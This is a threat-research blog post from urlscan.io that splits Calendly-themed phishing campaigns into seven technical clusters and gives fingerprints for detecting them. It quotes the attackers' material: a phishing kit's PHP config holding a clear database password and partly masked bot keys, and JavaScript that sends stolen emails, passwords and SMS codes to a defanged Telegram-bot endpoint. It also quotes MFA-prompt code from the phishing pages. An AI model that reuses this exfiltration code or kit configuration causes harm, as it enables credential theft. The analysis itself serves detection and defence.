urlscan.io logo urlscan.io

urlscan.io Blog

Beyond the Lure

Uncovering Distinct Phishing Tooling Behind Calendly-Themed Campaigns

– urlscan Threat Research Team

Research Phishing-kit Phishing Social-network Api Telegram Us Europe

urlscan Pro Report New

This is a public version of a report first published as an Intel Report on the urlscan Pro platform. The urlscan Pro version contains a more detailed look into the activity as well as more complex searches to cluster the activity. The urlscan Pro report also benefits from added visibility of Unlisted scans.

Phishing campaigns that impersonate a single brand are often assumed to come from a single source, but that assumption rarely holds up. Calendly is a widely used scheduling platform for booking meetings and interviews, making it a highly believable lure in phishing campaigns.

Calendly-themed phishing shows how one trusted workflow can be abused by multiple, unrelated phishing kits at the same time. While the pages may look similar, the underlying infrastructure and tooling often differ significantly.

Previous reporting from Push Security and Okta Threat Intelligence has highlighted the social engineering side of these campaigns. urlscan analysis shows that behind the shared Calendly branding sits a diverse set of phishing kits, including API-driven frameworks, real-time Socket.IO applications, fake CAPTCHA chains, and Telegram-based exfiltration.

This report breaks these campaigns into distinct technical clusters and provides urlscan fingerprints to help defenders tell them apart, track how the activity evolves, and avoid grouping fundamentally different threats together based on appearance alone.

Cluster 1

This cluster is a API-driven framework where frontend pages are powered by external infrastructure that controls logic, victim processing, and configuration.

Screenshot for Cluster 1

Key Technical Characteristics

The cluster is fingerprinted by a combination of a hardcoded query parameter and API endpoint structure, which together provide a stable detection primitive.

Every site needs to contact an API server. At present a total of 9 unique domains have been observed as backend API domains:


The /api/visitors/ endpoint returns enriched metadata about the visitor, including IP address, geolocation, and a blacklisted boolean.

The /api/config/{phishing_domain}/ endpoint returns per-site configuration such as display images, profile names, and branding assets.

Cluster 2

Cluster 2 is another API-backed setup but differs significantly in structure.

API calls are routed through PHP files with more available endpoints.

Screenshot for Cluster 2

Key Technical Characteristics

The cluster can be identified using the API filenames which run when a page is loaded.

Observed backend domains include:


An exposed directory listing on riftbloom[.]online contained a ZIP archive with the full backend source code, including database credentials, Telegram bot configuration, reCAPTCHA keys, and panel credentials.

Open directory: https://urlscan.io/result/019c0602-e0cb-702d-8358-2aeae38db712

This provided direct insight into the kit’s internal design and confirms Telegram as the primary exfiltration channel.

Inside the phishing kit there are all the php files which are called by the API from the phishing pages. The files within the kit are:

  • 2faemail.php
  • authnum.php
  • check.php
  • close_session.php
  • email.php
  • heartbeat.php
  • is_banned.php
  • lastphone.php
  • lastwhatsapp.php
  • login.php
  • otpphone.php
  • otp.php
  • password.php
  • phonenumber.php
  • phone.php
  • recap.php
  • redirectlink.php
  • reset.php
  • result.log
  • start_session.php
  • top-code.php
  • update_status.php
  • whatsapp.php

There is also a config file to allow a controlling actor the ability to quickly and easily setup and configure their phishing campaign:

    // Database Configuration
    define('DB_HOST', 'localhost');
    define('DB_NAME', 'rifttvcz_titanfb');
    define('DB_USER', 'rifttvcz_titanfb');
    define('DB_PASS', 'E3[Z$R%Yh&^R');

    // Admin Configuration
    define('ADMIN_USERNAME', 'baba**********');
    define('ADMIN_PASSWORD', 'baba******************');

    // Telegram Configuration
    define('TELEGRAM_TOKEN', '8230169***:AAH4ot**************************');
    define('TELEGRAM_CHAT_ID', '-5059748937');

    // ReCaptcha Configuration§§
    define('RECAPTCHA_SECRET_KEY', '6LeZX8orAAAAAIoTSrZm21cwf***************');

    // Telegram Notifications
    define('SEND_RECAPTCHA', true);
    define('SEND_EMAIL', true);
    define('SEND_LOGIN', true);
    define('SEND_PHONE', false);
    define('SEND_AUTH', true);
    define('SEND_OTP', true);
    define('SEND_EMAIL_OTP', true);
    define('SEND_WHATSAPP', true);
    try {
     $db = new PDO(
       "mysql:host=" . DB_HOST . ";dbname=" . DB_NAME,
       DB_USER,
       DB_PASS
     );
     $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    } catch (PDOException $e) {
     die("Connection failed: " . $e->getMessage());
    }

The backend logic is straightforward and lacks the more advanced anti-analysis techniques seen in other clusters. Despite this, urlscan data shows thousands of scans associated with this kit and over 200 unique hostnames, indicating wide distribution and long-term operational use.

The associated Telegram handle observed in the configuration is nayfercraxx.

Telegram User Profile of 'nayfercraxx'

­

Cluster 3

Cluster 3 is a smaller but distinct cluster that uses external backend infrastructure and uses session tracking logic.

Each visitor interaction is registered via a session_tracking.php endpoint.

Screenshot for Cluster 3

Key Technical Characteristics

The POST body for session registration is simple and consistent:

{
    "action": "register",
    "current_view": "/test"
}

The server responds with a session ID, confirming backend statefulness.

{
    "success": true,
    "session_id": "sess_16b34b09a54200507c5a578b481a002f",
    "current_view": "/test",
    "message": "Session registered successfully"
}

Observed backend domains seen so far:


All exfiltration and operator notifications are handled via a /telegram_bot.php endpoint hosted on the backend domains. The frontend JavaScript shows direct POST-based interaction with this endpoint, including SMS code forwarding and credential submission.

   try {
     const v = new FormData();
     v.append("action", "send_sms");
     v.append("session_id", ee.sessionId || "no_session");
     v.append("country", L);
     v.append("ip", I);
     if (_) {
       v.append("email", _.email);
       v.append("password", _.password);
     }
     const A = await (await fetch("https://44spark[.]com/telegram_bot.php", {
       method: "POST",
       body: v
     })).json();
     console.log("✅ SMS code sent to Telegram:", A);
   } catch (v) {
     console.error("❌ Error sending SMS code to Telegram:", v);
   }

While smaller in scale, the distinct session handling and Telegram-only exfiltration justifies treating this as a separate cluster.

Cluster 4

This cluster leverages Socket.IO to maintain persistent connections between the phishing page and backend infrastructure. Socket.IO is a JavaScript-based communication library that enables real-time, bidirectional messaging between a user’s browser and a backend server. In phishing kits, it is often abused to maintain live control of victim interactions, dynamically advance phishing flows, and exfiltrate data without relying on traditional form submissions.

Screenshot for Cluster 4

Key Technical Characteristics

Within this cluster, multiple sub-patterns exist.

Some deployments use a Browser-in-the-Browser (BitB) technique, where users are presented with a fake embedded browser window requesting Facebook credentials after selecting a meeting slot. Other variants use a full-page phishing flow while still relying on Socket.IO for backend communication.

Calendly page: https://urlscan.io/result/019c28c6-01a1-774a-a07c-07fced54fb6f

Phishing page: https://urlscan.io/result/019c28c5-d848-73ca-936b-75cb1cc8f94e

Screenshot for Cluster 4

A sample for the socket connection can be seen in the DOM:

__sveltekit_10x4gmz = {
   base: new URL(".", location).pathname.slice(0, -1),
   env: {"PUBLIC_SOCKET_URL":"https://tytsrv.onrender[.]com"}
};

Cluster 5

The first Fake CAPTCHA Kits cluster relies on user-generated hosting platforms, primarily vercel.app and herokuapp.com, allowing threat actors to deploy phishing pages without managing servers or domains.

The pages present a fake Cloudflare CAPTCHA that serves no functional purpose.

Screenshot for Cluster 5

Key Technical Characteristics

Landing page: https://urlscan.io/result/019c09fa-f9b9-758f-b8b7-b112eea05b3a

After the CAPTCHA step, victims are redirected into BitB-style phishing flows with support for multiple MFA methods, including authenticator apps, WhatsApp, SMS, and email.

Backend exfiltration occurs only after credential submission and therefore does not appear in initial HTTP requests.

Below is an excerpt of the backend JavaScript which runs the pages in this cluster. We have excluded some content for brevity and readability:

    const Fe = () => {
    if (S.includes("auth")) {
      return "Go to your authentication app";
    }
    if (S.includes("whatsapp")) {
      return "Check your Whatsapp";
    }
    if (S.includes("phone")) {
      return "Check your text messages";
    }
    if (S.includes("email")) {
      return "Check your e-mail";
    }
    const X = () => {
     if (S.includes("auth")) {
      return "Enter the 6-digit code for this account from the two-factor authentication app you set up (such as Duo Mobile or Google Authenticator).";
    }
    if (S.includes("whatsapp")) {
      return "Enter the code that we sent to your whatsapp.";
    }
    if (S.includes("phone")) {
      return "Enter the code that we sent to your phone number.";
    }
    if (S.includes("email")) {
      return "Enter the code we sent to your email.";
    }
    if (S.includes("auth")) {
      return "/assets/2fa-YwJricY1.svg";
    }
    if (S.includes("whatsapp")) {
      return "/assets/2fa-whatsapp.jpg";
    }
    if (S.includes("phone") || S.includes("email")) {
      return "/assets/2fa-phone-CEstYOjU.svg";
    }
    const et = async () => {
      ye("Please enter your code to continue.");
    }
    if (ae.length !== 6 && ae.length !== 8) {
      ye("Your code must be 6 or 8 digits. Please check and try again.");
    }
    switch (S) {
      case "2fa_auth":
      case "2fa_auth_wrong":
      case "2fa_whatsapp":
      case "2fa_whatsapp_wrong":
      case "2fa_phone":
      case "2fa_phone_wrong":
      case "2fa_email":
      case "2fa_email_wrong":
    }

Cluster 6

The second Fake CAPTCHA Kit cluster shares visual and narrative similarities with the previous Fake CAPTCHA Kit cluster but introduces an external API to control flow logic and filtering.

Screenshot for Cluster 6

Key Technical Characteristics

Example POST requests include structured scheduling metadata, while responses contain IP enrichment tokens, blocked email domains, and country-based IP filtering.

Observed backend domains include:


Notably in this cluster there are also pages which don’t have the same Calendly theming but are still linked to the same backend phishing kit. This shows how kits can go through updates and new branding over time.


Cluster 7

Cluster 7 is the final cluster and is characterized by direct communication with the Telegram Bot API for exfiltration, without intermediary backend infrastructure.

An example scan within this cluster is a Red Bull themed site hosted on amplifyapp[.]com - https://urlscan.io/result/019bda23-646d-7469-8c19-ab320681e885

Screenshot for Cluster 7

While Calendly-themed instances exist, the same tooling has been observed across multiple brands including Nike, Red Bull, Puma, and Zara, suggesting a reusable job-scam framework.

Expanding Beyond Known Clusters

These clusters do not represent the full visibility of Calendly-themed phishing. New kits continue to emerge, and existing ones evolve. To identify previously unseen tooling, analysts can construct a negative search that excludes known clusters while still hunting for Calendly themed sites to find new clusters:

This approach allows analysts to surface outliers, which can then be pivoted into new clusters through iterative fingerprinting.

Conclusion

Calendly phishing demonstrates a broader pattern increasingly visible across brand abuse: thematic consistency does not imply technical uniformity. By dissecting campaigns into infrastructure and logic-based clusters, analysts gain clearer insight into threat actor tooling, reuse patterns, and operational scale.

The key takeaway is simple but critical: clustering by brand alone is not sufficient. Tooling fingerprints, backend logic, and communication paths provide the durable signals needed to track and disrupt modern phishing ecosystems.

Further reading

If you would like to take a look at other resources on the same campaigns, take a look at the following intelligence reports published by other companies:

More on urlscan Pro

If you want to learn about the urlscan Pro platform and how it might be valuable for your organization feel free to reach out to us! We offer free trials with no strings attached. We would be happy to give you a passionate demo of what our platform can do for you. Reach out to us at sales@urlscan.io.